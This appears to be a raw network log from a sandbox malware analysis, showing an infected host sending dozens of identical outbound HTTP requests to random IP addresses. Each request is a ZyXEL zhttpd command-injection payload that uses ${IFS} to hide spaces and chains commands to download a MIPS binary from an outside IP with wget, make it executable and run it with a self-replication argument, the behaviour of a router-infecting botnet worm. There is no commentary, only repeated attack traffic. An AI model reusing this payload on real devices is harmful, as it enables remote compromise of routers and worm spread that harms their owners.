                                                        Jan 28, 2024 10:13:11.765700102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9166192.168.2.1457276103.72.198.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765718937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9167192.168.2.143854227.108.228.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765769958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9168192.168.2.1460498186.103.72.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765810966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9169192.168.2.144973694.249.85.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765852928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9170192.168.2.1455448111.32.174.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765903950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9171192.168.2.14387729.136.193.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765923977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9172192.168.2.1458410102.19.210.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765969038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9173192.168.2.14575545.104.212.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.765997887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9174192.168.2.143730892.197.34.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766064882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9175192.168.2.145569472.109.106.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766127110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9176192.168.2.1438396137.107.23.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766146898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9177192.168.2.1438694169.44.218.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766191959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9178192.168.2.1446992134.140.133.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766247988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9179192.168.2.1440502123.37.200.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766258955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9180192.168.2.1446952221.174.94.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766325951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9181192.168.2.145908234.79.215.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766360998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9182192.168.2.1460052108.37.149.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766402006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9183192.168.2.1460050188.202.232.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766433001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9184192.168.2.144086044.75.249.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766480923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9185192.168.2.144661499.141.75.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766518116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9186192.168.2.1442188111.12.215.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766549110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9187192.168.2.1439534102.72.14.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766602993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9188192.168.2.146074672.162.145.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766635895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9189192.168.2.1457258209.35.90.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766669035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9190192.168.2.144356094.150.82.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766699076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9191192.168.2.145477268.26.110.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766752005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192192.168.2.1445550123.14.147.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766783953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9193192.168.2.1456110149.47.202.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766822100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9194192.168.2.14397469.193.46.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766885042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9195192.168.2.1449626221.74.242.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766917944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9196192.168.2.1450124112.75.203.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766957998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9197192.168.2.1433208111.101.188.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.766978979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9198192.168.2.143828861.116.146.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767002106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9199192.168.2.1453248100.214.150.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767031908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9200192.168.2.1437028102.137.190.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767055035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9201192.168.2.1441464112.2.64.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767079115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9202192.168.2.1451218102.235.188.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767127991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9203192.168.2.1450546162.175.16.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767154932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9204192.168.2.1442602141.88.247.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767195940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9205192.168.2.1434838202.180.210.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767244101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9206192.168.2.1432966101.143.156.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767263889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9207192.168.2.143293845.194.158.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767323017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9208192.168.2.1435042181.47.236.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767332077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9209192.168.2.1444582199.1.27.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767368078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9210192.168.2.1449750201.79.2.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767422915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9211192.168.2.1446506118.16.23.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767463923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9212192.168.2.1444704169.168.154.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767488956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9213192.168.2.145612688.202.235.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767525911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9214192.168.2.1458770208.220.176.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767563105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9215192.168.2.1455930135.22.147.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767606974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9216192.168.2.144807883.212.237.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767651081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9217192.168.2.1455012101.50.248.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767687082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9218192.168.2.1438028128.63.62.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767736912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9219192.168.2.145473668.111.22.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767771959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9220192.168.2.1451736138.184.57.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767808914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9221192.168.2.143533693.112.16.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767846107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9222192.168.2.1446482181.158.40.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767898083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9223192.168.2.1459478216.119.237.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767921925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9224192.168.2.14328141.213.239.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.767965078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9225192.168.2.145148842.71.225.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768002033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9226192.168.2.143824481.156.218.149443
                                                        TimestampBytes transferredDirectionData
